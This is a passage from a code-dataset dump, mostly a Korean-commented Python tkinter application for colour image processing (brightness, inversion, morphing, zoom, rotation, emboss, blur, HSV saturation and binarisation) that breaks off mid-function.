: %.6f' % (MAE_GTEx_best) + '\\n')\n outlog.close()\n print('Finish Training')\nmain()","sub_path":"pytorch/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":7681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"98768152","text":"# 컴퓨터 비전(딥러닝) 칼러비전을 완료하기\r\n# <심화> 추가로 기능을 구현하기\r\n\r\nfrom tkinter import *\r\nfrom tkinter.simpledialog import *\r\nfrom tkinter.filedialog import *\r\nimport math\r\nimport os\r\nimport os.path\r\nimport pymysql\r\nimport numpy as np\r\nfrom PIL import Image, ImageFilter, ImageEnhance, ImageOps\r\nimport time\r\n# 파일을 선택해서 메모리로 로딩하는 함수\r\n\r\n####################\r\n# 메모리를 할당해서 리스트(참조)를 반환하는 함수\r\ndef malloc(h, w, initValue=0) :\r\n retMemory= []\r\n for _ in range(h) :\r\n tmpList = []\r\n for _ in range(w) :\r\n tmpList.append(initValue)\r\n retMemory.append(tmpList)\r\n return retMemory\r\n\r\n# 파일을 메모리로 로딩하는 함수\r\ndef loadImageColor(fname) :\r\n global window, canvas, paper, filename, inImage, outImage, inH, inW, outH, outW\r\n global photo\r\n inImage = []\r\n photo = Image.open(fname) # PIL 객체\r\n inW = photo.width; inH=photo.height # 불러오는 사진의 크기\r\n ## 메모리 확보\r\n for _ in range(3) : # 3면 확보\r\n inImage.append(malloc(inH, inW))\r\n photoRGB = photo.convert('RGB') # RGB색을 만들기 위함.\r\n print(photoRGB)\r\n for i in range(inH) :\r\n for k in range(inW) :\r\n r, g, b = photoRGB.getpixel((k,i)) # (163, 58, 73) 형태로 나옴. jpg이기 때문에 기존 raw와는 다르다.\r\n inImage[R][i][k] = r\r\n inImage[G][i][k] = g\r\n inImage[B][i][k] = b\r\n\r\ndef openImageColor() :\r\n global window, canvas, paper, filename, inImage, outImage,inH, inW, outH, outW\r\n filename = askopenfilename(parent=window,\r\n filetypes=((\"칼라 파일\", \"*.jpg;*.png;*.bmp;*.tif\"), (\"모든 파일\", \"*.*\")))\r\n if filename == '' or filename == None :\r\n return\r\n loadImageColor(filename) # load를 하면, 불러온 사진에서 inImage의 픽셀 값이 저장됨.\r\n equalImageColor()\r\n\r\ndef displayImageColor() :\r\n global window, canvas, paper, filename, inImage, outImage, inH, inW, outH, outW\r\n if canvas != None : # 예전에 실행한 적이 있다.\r\n canvas.destroy()\r\n global VIEW_X, VIEW_Y\r\n #가로/세로 비율 계산\r\n ratio = outH / outW\r\n ## 고정된 화면 크기\r\n if outH <= VIEW_Y or outW <= VIEW_X:\r\n VIEW_X = outW\r\n VIEW_Y = outH\r\n step = 1\r\n else:\r\n VIEW_X = 512\r\n VIEW_Y = 512\r\n step = outW / VIEW_X\r\n\r\n window.geometry(str(int(VIEW_X*1.2)) + 'x' + str(int(VIEW_Y*1.2))) # 벽\r\n canvas = Canvas(window, height=VIEW_Y, width=VIEW_X)\r\n paper = PhotoImage(height=VIEW_Y, width=VIEW_X)\r\n canvas.create_image((VIEW_X // 2, VIEW_Y // 2), image=paper, state='normal')\r\n\r\n import numpy\r\n rgbStr = '' # 전체 픽셀의 문자열을 저장\r\n for i in numpy.arange(0,outH, step) :\r\n tmpStr = ''\r\n for k in numpy.arange(0,outW, step) :\r\n i = int(i); k = int(k)\r\n r , g, b = outImage[R][i][k], outImage[G][i][k], outImage[B][i][k]\r\n tmpStr += ' #%02x%02x%02x' % (r,g,b)\r\n rgbStr += '{' + tmpStr + '} '\r\n paper.put(rgbStr)\r\n canvas.pack(expand=1, anchor=CENTER)\r\n status.configure(text='이미지 정보:' + str(outW) + 'x' + str(outH))\r\n\r\n\r\nimport numpy as np\r\n# JGG 파일이 임시 저장소에 저장. (AppData) -> 참고로, RAW와 jpg 저장 방식은 다르다.(내가 여기서 고민 많이 함.)\r\ndef saveImageColor():\r\n global window, canvas, paper, filename, inImage, outImage, inH, inW, outH, outW\r\n if outImage == None :\r\n return\r\n outArray = []\r\n for i in range(outH):\r\n tmpList = []\r\n for k in range(outW):\r\n tup = tuple([outImage[R][i][k], outImage[G][i][k], outImage[B][i][k]])\r\n tmpList.append(tup)\r\n outArray.append(tmpList)\r\n\r\n outArray = np.array(outArray)\r\n savePhoto = Image.fromarray(outArray.astype(np.uint8), 'RGB')\r\n saveFp = asksaveasfile(parent=window, mode='wb',\r\n defaultextension='.', filetypes=((\"그림 파일\", \"*.png;*.jpg;*.bmp;*.tif\"), (\"모든 파일\", \"*.*\")))\r\n if saveFp == '' or saveFp == None:\r\n return\r\n\r\n savePhoto.save(saveFp.name)\r\n print('Save~')\r\n\r\n###############################################\r\n##### 컴퓨터 비전(영상처리) 알고리즘 함수 모음 #####\r\n###############################################\r\n# 동일영상 알고리즘\r\ndef equalImageColor() :\r\n global window, canvas, paper, filename, inImage, outImage, inH, inW, outH, outW\r\n ## 중요! 코드. 출력영상 크기 결정 ##\r\n outH = inH; outW = inW;\r\n ## 메모리 확보\r\n outImage = []\r\n for _ in range(3):\r\n outImage.append(malloc(outH, outW))\r\n ############################\r\n ### 진짜 컴퓨터 비전 알고리즘 ###\r\n for RGB in range(3) : # RGB가 0면, 1면, 2면으로 값이 저장됨.\r\n for i in range(inH) :\r\n for k in range(inW) :\r\n outImage[RGB][i][k] = inImage[RGB][i][k]\r\n #############################\r\n displayImageColor()\r\n\r\ndef addImageColor() :\r\n global window, canvas, paper, filename, inImage, outImage, inH, inW, outH, outW\r\n ## 중요! 코드. 출력영상 크기 결정 ##\r\n outH = inH; outW = inW;\r\n ## 메모리 확보\r\n outImage = [] # 이미지를 불러올 때 outImage에 값이 저장되어 있기 때문에 초기화를 시켜줘야 한다.\r\n for _ in range(3):\r\n outImage.append(malloc(outH, outW))\r\n ############################\r\n ### 진짜 컴퓨터 비전 알고리즘 ###\r\n value = askinteger(\"밝게/어둡게\", \"값-->\", minvalue=-255, maxvalue=255)\r\n for RGB in range(3) :\r\n for i in range(inH) :\r\n for k in range(inW) :\r\n if inImage[RGB][i][k] + value > 255 :\r\n outImage[RGB][i][k] = 255\r\n elif inImage[RGB][i][k] + value < 0 :\r\n outImage[RGB][i][k] = 0\r\n else :\r\n outImage[RGB][i][k] = inImage[RGB][i][k] + value\r\n #############################\r\n displayImageColor()\r\n\r\ndef revImageColor() :\r\n global window, canvas, paper, filename, inImage, outImage, inH, inW, outH, outW\r\n ## 중요! 코드. 출력영상 크기 결정 ##\r\n outH = inH;\r\n outW = inW;\r\n ## 메모리 확보\r\n outImage = []\r\n for _ in range(3):\r\n outImage.append(malloc(outH, outW))\r\n ############################\r\n ### 진짜 컴퓨터 비전 알고리즘 ###\r\n for RGB in range(3):\r\n for i in range(inH):\r\n for k in range(inW):\r\n outImage[RGB][i][k] = 255 - inImage[RGB][i][k]\r\n #############################\r\n displayImageColor()\r\n\r\ndef paraImageColor() :\r\n global window, canvas, paper, filename, inImage, outImage, inH, inW, outH, outW\r\n ## 중요! 코드. 출력영상 크기 결정 ##\r\n outH = inH;\r\n outW = inW;\r\n ## 메모리 확보\r\n outImage = []\r\n for _ in range(3):\r\n outImage.append(malloc(outH, outW))\r\n ############################\r\n ### 진짜 컴퓨터 비전 알고리즘 ###\\\r\n LUT = [0 for _ in range(256)]\r\n for input in range(256):\r\n LUT[input] = int(255 - 255 * math.pow(input / 128 - 1, 2)) # 파라볼라 값을 적용한 픽셀.\r\n\r\n for RGB in range(3):\r\n for i in range(inH):\r\n for k in range(inW):\r\n outImage[RGB][i][k] = LUT[inImage[RGB][i][k]]\r\n #############################\r\n displayImageColor()\r\n\r\ndef morphImageColor() :\r\n global window, canvas, paper, filename, inImage, outImage, inH, inW, outH, outW\r\n ## 중요! 코드. 출력영상 크기 결정 ##\r\n outH = inH;\r\n outW = inW;\r\n ## 추가 영상 선택\r\n filename2 = askopenfilename(parent=window,\r\n filetypes=((\"칼라 파일\", \"*.jpg;*.png;*.bmp;*.tif\"), (\"모든 파일\", \"*.*\")))\r\n if filename2 == '' or filename2 == None:\r\n return\r\n inImage2 = []\r\n photo2 = Image.open(filename2) # PIL 객체\r\n inW2 = photo2.width; inH2=photo2.height\r\n ## 메모리 확보\r\n for _ in range(3) :\r\n inImage2.append(malloc(inH2, inW2))\r\n\r\n photoRGB2 = photo2.convert('RGB')\r\n for i in range(inH2) :\r\n for k in range(inW2) :\r\n r, g, b = photoRGB2.getpixel((k,i))\r\n inImage2[R][i][k] = r\r\n inImage2[G][i][k] = g\r\n inImage2[B][i][k] = b\r\n\r\n ## 메모리 확보\r\n outImage = []\r\n for _ in range(3):\r\n outImage.append(malloc(outH, outW))\r\n\r\n import threading\r\n import time\r\n def morpFunc():\r\n w1 = 1;\r\n w2 = 0\r\n for _ in range(20): # 20번 깜빡\r\n for RGB in range(3) :\r\n for i in range(inH):\r\n for k in range(inW):\r\n newValue = int(inImage[RGB][i][k] * w1 + inImage2[RGB][i][k] * w2) # 하나는 꺼지고, 다른 하나는 켜지는 과정.\r\n if newValue > 255:\r\n newValue = 255\r\n elif newValue < 0:\r\n newValue = 0\r\n outImage[RGB][i][k] = newValue\r\n displayImageColor()\r\n w1 -= 0.05 # 점점 픽셀 값이 작아지고,\r\n w2 += 0.05 # 점점 픽셀 값이 커짐.\r\n time.sleep(0.5) # 시간을 0.5초로 잡자.\r\n\r\n threading.Thread(target=morpFunc).start()\r\n\r\n# 상하반전 알고리즘\r\ndef upDownImageColor() :\r\n global window, canvas, paper, filename, inImage, outImage, inH, inW, outH, outW\r\n ## 중요! 코드. 출력영상 크기 결정 ##\r\n outH = inH; outW = inW;\r\n ###### 메모리 할당 ################\r\n outImage = [];\r\n for _ in range(3):\r\n outImage.append(malloc(outH, outW))\r\n ####### 진짜 컴퓨터 비전 알고리즘 #####\r\n for RGB in range(3) :\r\n for i in range(inH) :\r\n for k in range(inW) :\r\n outImage[RGB][inH-i-1][k] = inImage[RGB][i][k]\r\n displayImageColor()\r\n\r\n# 화면이동 알고리즘\r\ndef moveImageColor():\r\n global panYN\r\n panYN = True # 마우스가 먹음\r\n canvas.configure(cursor = 'mouse')\r\n\r\ndef mouseClick(event):\r\n global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH\r\n global sx, sy, ex, ey, panYN\r\n if panYN == False: # 진행하지 말아라. 마우스 클릭 해봤자 아무 반응도 안함.\r\n return\r\n sx = event.x; sy = event.y # 클릭해라.\r\n\r\ndef mouseDrop(event):\r\n global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH\r\n global sx, sy, ex, ey, panYN\r\n if panYN == False: # 진행하지 말아라. 마우스 클릭 해봤자 아무 반응도 안함.\r\n return\r\n ex = event.x; ey = event.y\r\n ## 중요! 코드, 출력영상 크기 결정 ##\r\n outH = inH;\r\n outW = inW\r\n ###################################\r\n outImage = []\r\n for _ in range(3):\r\n outImage.append(malloc(outH, outW))\r\n ########진짜 컴퓨터 비전 알고리즘 ########\r\n mx = sx - ex; my = sy - ey # x, y에 대한 이동 양\r\n for RGB in range(3):\r\n for i in range(inH):\r\n for k in range(inW):\r\n if 0 <= i-my < outW and 0 <= k-mx < outH:\r\n outImage[RGB][i-my][k-mx] = inImage[RGB][i][k]\r\n panYN = False\r\n displayImageColor()\r\n\r\n# 영상 축소 알고리즘\r\ndef zoomOutImageColor() :\r\n global window, canvas, paper, filename, inImage, outImage, inH, inW, outH, outW\r\n scale = askinteger(\"축소\", \"값-->\", minvalue=2, maxvalue=16)\r\n ## 중요! 코드. 출력영상 크기 결정 ##\r\n outH = inH//scale; outW = inW//scale;\r\n ###### 메모리 할당 ################\r\n outImage = [];\r\n for _ in range(3):\r\n outImage.append(malloc(outH, outW))\r\n ####### 진짜 컴퓨터 비전 알고리즘 #####\r\n for RGB in range(3) :\r\n for i in range(outH) :\r\n for k in range(outW) :\r\n outImage[RGB][i][k] = inImage[RGB][i*scale][k*scale]\r\n\r\n displayImageColor()\r\n\r\n# 영상 확대 알고리즘\r\ndef zoomInImageColor() :\r\n global window, canvas, paper, filename, inImage, outImage, inH, inW, outH, outW\r\n scale = askinteger(\"확대\", \"값-->\", minvalue=2, maxvalue=8)\r\n ## 중요! 코드. 출력영상 크기 결정 ##\r\n outH = inH*scale; outW = inW*scale;\r\n ###### 메모리 할당 ################\r\n outImage = [];\r\n for _ in range(3):\r\n outImage.append(malloc(outH, outW))\r\n ####### 진짜 컴퓨터 비전 알고리즘 #####\r\n for RGB in range(3) :\r\n for i in range(outH) :\r\n for k in range(outW) :\r\n outImage[RGB][i][k] = inImage[RGB][i//scale][k//scale]\r\n displayImageColor()\r\n\r\n# 영상 회전 알고리즘\r\ndef rotateImageColor():\r\n global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH\r\n angle = askinteger(\"회전\", \"값~~>\", minvalue=1, maxvalue=360)\r\n ## 중요! 코드, 출력영상 크기 결정 ##\r\n outH = inH;\r\n outW = inW\r\n ############메모리 할당###################\r\n outImage = []\r\n for _ in range(3):\r\n outImage.append(malloc(outH, outW))\r\n ########진짜 컴퓨터 비전 알고리즘 ########\r\n radian = angle * math.pi / 180\r\n for RGB in range(3):\r\n for i in range(inH):\r\n for k in range(inW):\r\n xs = i; ys = k;\r\n xd = int(math.cos(radian) * xs - math.sin(radian) *ys)\r\n yd = int(math.sin(radian) * xs + math.sin(radian) *ys)\r\n if 0 <= xd < inH and 0 <= yd < inW :\r\n outImage[RGB][xd][yd] = inImage[RGB][i][k]\r\n displayImageColor()\r\n\r\n# 영상 회전 알고리즘 - 중심, 역방향\r\ndef rotateImage2Color() :\r\n global window, canvas, paper, filename, inImage, outImage, inH, inW, outH, outW\r\n angle = askinteger(\"회전\", \"값-->\", minvalue=1, maxvalue=360)\r\n ## 중요! 코드. 출력영상 크기 결정 ##\r\n outH = inH; outW = inW;\r\n ###### 메모리 할당 ################\r\n outImage = []\r\n for _ in range(3):\r\n outImage.append(malloc(outH, outW))\r\n ####### 진짜 컴퓨터 비전 알고리즘 #####\r\n radian = angle * math.pi / 180\r\n cx = inW//2; cy = inH//2 # (cx, cy)는 중심점.\r\n for RGB in range(3):\r\n for i in range(outH) :\r\n for k in range(outW) :\r\n xs = i ; ys = k;\r\n xd = int(math.cos(radian) * (xs-cx) - math.sin(radian) * (ys-cy)) + cx\r\n yd = int(math.sin(radian) * (xs-cx) + math.cos(radian) * (ys-cy)) + cy\r\n if 0<= xd < outH and 0 <= yd < outW :\r\n outImage[RGB][xs][ys] = inImage[RGB][xd][yd]\r\n else :\r\n outImage[RGB][xs][ys] = 255\r\n\r\n displayImageColor()\r\n\r\n# 엠보싱 처리\r\ndef embossImageRGB():\r\n global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH\r\n ## 중요! 코드, 출력영상 크기 결정 ##\r\n outH = inH;\r\n outW = inW\r\n ###################################\r\n outImage = []\r\n for _ in range(3):\r\n outImage.append(malloc(outH, outW))\r\n ########진짜 컴퓨터 비전 알고리즘 ########\r\n MSIZE = 3\r\n mask = [ [-1, 0, 0],\r\n [ 0, 0, 0],\r\n [ 0, 0, 1] ]\r\n\r\n ## 임시 입력영상 메모리 확보 -> Input 메모리 확보를 위한.\r\n tmpInImage, tmpOutImage = [], []\r\n for _ in range(3):\r\n tmpInImage.append(malloc(inH + (MSIZE - 1), inW + (MSIZE -1), 127)) # 127은 중간값 / 마스크에 따라 바깥 처리를 달리한다.\r\n for _ in range(3):\r\n tmpOutImage.append(malloc(outH, outW))\r\n ## 원 입력 ~~> 임시 입력\r\n for RGB in range(3):\r\n for i in range(inH):\r\n for k in range(inW):\r\n tmpInImage[RGB][i+MSIZE//2][k+MSIZE//2] = inImage[RGB][i][k] # 바깥 쪽 값 입력\r\n ## 회선연산\r\n for RGB in range(3):\r\n for i in range(MSIZE//2, inH + MSIZE//2): # 큰 틀이 주가 아니라, 더 안쪽의 값이 inputImage임\r\n for k in range(MSIZE//2, inW + MSIZE//2):\r\n # 각 점을 처리\r\n S = 0.0# S는 누적값\r\n for m in range(0, MSIZE):\r\n for n in range(0, MSIZE):\r\n S += mask[m][n] * tmpInImage[RGB][i + m - MSIZE//2][k + n - MSIZE//2]\r\n tmpOutImage[RGB][i-MSIZE//2][k-MSIZE//2] = S\r\n ## 127 더하기 -> 선택해서 진행.\r\n for RGB in range(3):\r\n for i in range(outH):\r\n for k in range(outW):\r\n tmpOutImage[RGB][i][k] += 127\r\n for RGB in range(3):\r\n ## 임시 출력 --> 원 출력\r\n for i in range(outH):\r\n for k in range(outW):\r\n value = tmpOutImage[RGB][i][k]\r\n if value > 255:\r\n value = 255\r\n elif value < 0:\r\n value = 0\r\n outImage[RGB][i][k] = int(value)\r\n displayImageColor()\r\n\r\ndef embossImagePillow():\r\n global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH\r\n global photo\r\n ## 중요! 코드, ���력영상 크기 결정 ##\r\n photo2 = photo.copy()\r\n photo2 = photo2.filter(ImageFilter.EMBOSS)\r\n ## 중요! 코드, 출력영상 크기 결정 ##\r\n outH = inH;\r\n outW = inW\r\n ############메모리 할당################\r\n outImage = []\r\n for _ in range(3):\r\n outImage.append(malloc(outH, outW))\r\n for i in range(outH) :\r\n for k in range(outW) :\r\n r, g, b = photo2.getpixel((k,i)) # (163, 58, 73) 형태로 나옴. jpg이기 때문에 기존 raw와는 다르다.\r\n outImage[R][i][k] = r\r\n outImage[G][i][k] = g\r\n outImage[B][i][k] = b\r\n displayImageColor()\r\n\r\nimport colorsys\r\nsx, sy, ex, ey = [0] * 4# start, end\r\ndef embossImageHSV(): # 마우스 입력 받고 처리를 할 것임. 후에 밑에 __에서 emboss 처리가 진행 될 것임.\r\n global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH\r\n global sx,sy,ex,ey\r\n ## 이벤트 바인드\r\n canvas.bind(\"\", rightMouseClick_embossImageHSV) # 은 오른쪽 버튼\r\n canvas.bind(\"\", leftMouseClick)\r\n canvas.bind(\"\", leftMouseMove)\r\n canvas.bind(\"\", leftMouseDrop_embossImageHSV)\r\n canvas.configure(cursor='mouse')\r\n\r\ndef leftMouseDrop_embossImageHSV(event):\r\n global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH\r\n global sx, sy, ex, ey\r\n ex = event.x\r\n ey = event.y\r\n #####################\r\n __embossImageHSV()\r\n #####################\r\n canvas.unbind(\"\") # 은 오른쪽 버튼\r\n canvas.unbind(\"\")\r\n canvas.unbind(\"\")\r\n canvas.unbind(\"\")\r\n\r\nboxLine = None\r\ndef leftMouseMove(event):\r\n global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH\r\n global sx,sy,ex,ey, boxLine\r\n ex = event.x; ey = event.y\r\n #움직일 때마다 사진이 움직이고, 앞쪽은 지워져야 함.\r\n if not boxLine:\r\n pass\r\n else:\r\n canvas.delete(boxLine)\r\n boxLine = canvas.create_rectangle(sx,sy,ex,ey,fill=None)\r\n\r\ndef leftMouseClick(event):\r\n global sx,sy,ex,ey\r\n sx = event.x; sy = event.y\r\n\r\ndef rightMouseClick_embossImageHSV(event): # 마우스 오른쪽 버튼 드래그 하면 엠보싱 HSV 처리가 됨.\r\n global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH\r\n global sx, sy, ex, ey\r\n sx = 0; sy = 0; ex = inH - 1; ey = inW - 1 # 마지막 점까지 인정해주기 위해 -1을 함. 0 ~ inH-1\r\n #####################\r\n __embossImageHSV()\r\n #####################\r\n canvas.unbind(\"\") # 은 오른쪽 버튼\r\n canvas.unbind(\"\")\r\n canvas.unbind(\"\")\r\n canvas.unbind(\"\")\r\n\r\ndef __embossImageHSV():\r\n global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH\r\n ## 입력 RGB --> 입력 HSV\r\n ## 메모리 확보\r\n inImageHSV = []\r\n for _ in range(3):\r\n inImageHSV.append(malloc(inH, inW))\r\n #RGB -> HSV\r\n for i in range(inH):\r\n for k in range(inW):\r\n r, g, b = inImage[R][i][k], inImage[G][i][k], inImage[B][i][k]\r\n h, s, v = colorsys.rgb_to_hsv(r/255, g/255, b/255)\r\n ## 색상(Hue), 채도(Saturation), 명도(Value)\r\n ## RGB는 0~255까지 받는데, HSV는 0~1.0까지로 받을 수 있음.\r\n inImageHSV[0][i][k], inImageHSV[1][i][k], inImageHSV[2][i][k] = h, s, v\r\n ## h,s,v를 inImageHSV에 저장함.\r\n\r\n ## 중요! 코드, 출력영상 크기 결정 ##\r\n outH = inH;\r\n outW = inW\r\n ###################################\r\n outImage = []\r\n for _ in range(3):\r\n outImage.append(malloc(outH, outW))\r\n ########진짜 컴퓨터 비전 알고리즘 ########\r\n MSIZE = 3\r\n mask = [[-1, 0, 0],\r\n [0, 0, 0],\r\n [0, 0, 1]]\r\n\r\n ## 임시 입력영상 메모리 확보 -> Input 메모리 확보를 위한.\r\n tmpInImageV, tmpOutImageV = [], []\r\n tmpInImageV = (malloc(inH + (MSIZE - 1), inW + (MSIZE - 1), 127)) # 127은 중간값 / 마스크에 따라 바깥 처리를 달리한다.\r\n tmpOutImageV = (malloc(outH, outW))\r\n ## 원 입력 ~~> 임시 입력\r\n for i in range(inH):\r\n for k in range(inW):\r\n tmpInImageV[i + MSIZE // 2][k + MSIZE // 2] = inImageHSV[2][i][k] # 바깥 쪽 값 입력\r\n ## 회선연산\r\n for i in range(MSIZE // 2, inH + MSIZE // 2): # 큰 틀이 주가 아니라, 더 안쪽의 값이 inputImage임\r\n for k in range(MSIZE // 2, inW + MSIZE // 2):\r\n # 각 점을 처리\r\n S = 0.0 # S는 누적값\r\n for m in range(0, MSIZE):\r\n for n in range(0, MSIZE):\r\n S += mask[m][n] * tmpInImageV[i + m - MSIZE // 2][k + n - MSIZE // 2]\r\n tmpOutImageV[i - MSIZE // 2][k - MSIZE // 2] = S * 255\r\n ## 127 더하기 -> 선택해서 진행.\r\n for i in range(outH):\r\n for k in range(outW):\r\n tmpOutImageV[i][k] += 127\r\n if tmpOutImageV[i][k] > 255:\r\n tmpOutImageV[i][k] = 255\r\n elif tmpOutImageV[i][k] < 0:\r\n tmpOutImageV[i][k] = 0\r\n\r\n ## HSV --> RGB\r\n for i in range(outH):\r\n for k in range(outW):\r\n if sx <= k <= ex and sy <= i <= ey : # 범위에 포함되면\r\n h, s, v = inImageHSV[0][i][k], inImageHSV[1][i][k], tmpOutImageV[i][k]\r\n r, g, b = colorsys.hsv_to_rgb(h, s, v)\r\n outImage[R][i][k], outImage[G][i][k], outImage[B][i][k] = int(r), int(g), int(b)\r\n else:\r\n outImage[R][i][k], outImage[G][i][k], outImage[B][i][k] = inImage[R][i][k], inImage[G][i][k], inImage[B][i][k]\r\n\r\n displayImageColor()\r\n\r\ndef blurrImageRGB():\r\n global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH\r\n ## 중요! 코드, 출력영상 크기 결정 ##\r\n outH = inH;\r\n outW = inW\r\n ###################################\r\n outImage = []\r\n for _ in range(3):\r\n outImage.append(malloc(outH, outW))\r\n ########진짜 컴퓨터 비전 알고리즘 ########\r\n MSIZE = 3\r\n mask = [ [1/9, 1/9, 1/9],\r\n [1/9, 1/9, 1/9],\r\n [1/9, 1/9, 1/9] ]\r\n\r\n ## 임시 입력영상 메모리 확보 -> Input 메모리 확보를 위한.\r\n tmpInImage, tmpOutImage = [], []\r\n for _ in range(3):\r\n tmpInImage.append(malloc(inH + (MSIZE - 1), inW + (MSIZE -1), 127)) # 127은 중간값 / 마스크에 따라 바깥 처리를 달리한다.\r\n for _ in range(3):\r\n tmpOutImage.append(malloc(outH, outW))\r\n ## 원 입력 ~~> 임시 입력\r\n for RGB in range(3):\r\n for i in range(inH):\r\n for k in range(inW):\r\n tmpInImage[RGB][i+MSIZE//2][k+MSIZE//2] = inImage[RGB][i][k] # 바깥 쪽 값 입력\r\n ## 회선연산\r\n for RGB in range(3):\r\n for i in range(MSIZE//2, inH + MSIZE//2): # 큰 틀이 주가 아니라, 더 안쪽의 값이 inputImage임\r\n for k in range(MSIZE//2, inW + MSIZE//2):\r\n # 각 점을 처리\r\n S = 0.0# S는 누적값\r\n for m in range(0, MSIZE):\r\n for n in range(0, MSIZE):\r\n S += mask[m][n] * tmpInImage[RGB][i + m - MSIZE//2][k + n - MSIZE//2]\r\n tmpOutImage[RGB][i-MSIZE//2][k-MSIZE//2] = S\r\n for RGB in range(3):\r\n ## 임시 출력 --> 원 출력\r\n for i in range(outH):\r\n for k in range(outW):\r\n value = tmpOutImage[RGB][i][k]\r\n if value > 255:\r\n value = 255\r\n elif value < 0:\r\n value = 0\r\n outImage[RGB][i][k] = int(value)\r\n displayImageColor()\r\ndef addSValuePillow():\r\n global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH\r\n global photo\r\n ## 중요! 코드, 출력영상 크기 결정 ##\r\n value = askfloat(\"\", \"0-1-10\") # 1보다 커지면 채도가 진해지고, ....\r\n photo2 = photo.copy()\r\n photo2 = ImageEnhance.Color(photo2)\r\n photo2 = photo2.enhance(value)\r\n\r\n ## 중요! 코드, 출력영상 크기 결정 ##\r\n outH = inH;\r\n outW = inW\r\n ############메모리 할당################\r\n outImage = []\r\n for _ in range(3):\r\n outImage.append(malloc(outH, outW))\r\n for i in range(outH) :\r\n for k in range(outW) :\r\n r, g, b = photo2.getpixel((k,i)) # (163, 58, 73) 형태로 나옴. jpg이기 때문에 기존 raw와는 다르다.\r\n outImage[R][i][k] = r\r\n outImage[G][i][k] = g\r\n outImage[B][i][k] = b\r\n displayImageColor()\r\n\r\ndef addSValueHSV():\r\n global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH\r\n ## 입력 RGB --> 입력 HSV\r\n ## 메모리 확보\r\n inImageHSV = []\r\n for _ in range(3):\r\n inImageHSV.append(malloc(inH, inW))\r\n # RGB -> HSV\r\n for i in range(inH):\r\n for k in range(inW):\r\n r, g, b = inImage[R][i][k], inImage[G][i][k], inImage[B][i][k]\r\n h, s, v = colorsys.rgb_to_hsv(r / 255, g / 255, b / 255)\r\n ## 색상(Hue), 채도(Saturation), 명도(Value)\r\n ## RGB는 0~255까지 받는데, HSV는 0~1.0까지로 받을 수 있음.\r\n inImageHSV[0][i][k], inImageHSV[1][i][k], inImageHSV[2][i][k] = h, s, v\r\n ## h,s,v를 inImageHSV에 저장함.\r\n\r\n ## 중요! 코드, 출력영상 크기 결정 ##\r\n outH = inH;\r\n outW = inW\r\n #####메모리 할당##################\r\n outImage = []\r\n for _ in range(3):\r\n outImage.append(malloc(outH, outW))\r\n ####진짜 컴퓨터 비전 알고리즘 #############\r\n value = askfloat(\"\", \"-255-255\")\r\n value /= 255\r\n ## HSV --> RGB\r\n for i in range(outH):\r\n for k in range(outW):\r\n newS = inImageHSV[1][i][k] + value\r\n if newS < 0: #1이 넘어가면 안됨.\r\n newS =0\r\n elif newS > 1.0:\r\n newS = 1.0\r\n h, s, v = inImageHSV[0][i][k], newS, inImageHSV[2][i][k] * 255\r\n r, g, b = colorsys.hsv_to_rgb(h, s, v)\r\n outImage[R][i][k], outImage[G][i][k], outImage[B][i][k] = int(r), int(g), int(b)\r\n displayImageColor()\r\n\r\n\r\n# 이진화(=흑백 칼러? 영상)\r\ndef bwImageColor():\r\n global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH\r\n ## 중요! 코드, 출력영상 크기 결정 ##\r\n outH = inH;\r\n outW = inW\r\n ###############메모리 할당####################\r\n outImage = []\r\n for _ in range(3):\r\n outImage.append(malloc(outH, outW))\r\n ########진짜 컴퓨터 비전 알고리즘 ########\r\n # avg_RGB[][] 만들기 => inImage[R] inImage[G] inImage[B]를 하나로 통합\r\n avg_RGB = [] # inImage에서 [R], [G], [B]의 평균을 구하기 위함.\r\n avg_RGB = malloc(inH, inW)\r\n for i in range(inH):\r\n for k in range(inW):\r\n avg_RGB[i][k] = (inImage[R][i][k] + inImage[G][i][k] + inImage[B][i][k]) // 3\r\n\r\n # avg_RGB[][]의 평균 계산.\r\n sum = 0\r\n for i in range(inH):\r\n for k in range(inW):\r\n sum += avg_RGB[i][k]\r\n avg = sum // (inH * inW)\r\n\r\n # 이진화 진행 => avg_RGB[][]의 평균 값과 비교\r\n for i in range(inH):\r\n for k in range(inW):\r\n if avg_RGB[i][k] > avg:\r\n outImage[R][i][k] = outImage[G][i][k] = outImage[B][i][k] = 255\r\n else:\r\n outImage[R][i][k] = outImage[G][i][k] = outImage[B][i][k] = 0\r\n\r\n displayImageColor()\r\n\r\n#영상 축소 알고리즘(평균변환)\r\ndef zoomOutImage2Color():\r\n global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH\r\n value = askinteger(\"축소\", \"값~~>\", minvalue=2, maxvalue=16) # 최소 1, 최대 255\r\n ## 중요! 코드, 출력영상 크기 결정 ##\r\n outH = inH//value\r\n outW = inW//value\r\n ###################################\r\n outImage = []\r\n for _ in range(3):\r\n outImage.append(malloc(outH, outW))\r\n ########진짜 컴퓨터 비전 알고리즘 ########\r\n for RGB in range(3):\r\n for i in range(inH):\r\n for k in range(inW):\r\n outImage[RGB][i//value][k//value] += inImage[RGB][i][k]\r\n for m in range(outH):\r\n for n in range(outW):\r\n outImage[RGB][m][n] //= (value*value)\r\n displayImageColor()\r\n\r\n# 영상 확대 알고리즘 (양선형 보간) -> 영상 품질을 향상시킬 수 있음.\r\ndef zoomInImage2Color():\r\n global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH\r\n value = askinteger(\"확대\", \"값~~>\", minvalue=2, maxvalue=4) # 최소 1, 최대 255\r\n ## 중요! 코드, 출력영상 크기 결정 ##\r\n outH = inH * value\r\n outW = inW * value\r\n ###################################\r\n outImage = []\r\n for _ in range(3):\r\n outImage.append(malloc(outH, outW))\r\n ########진짜 컴퓨터 비전 알고리즘 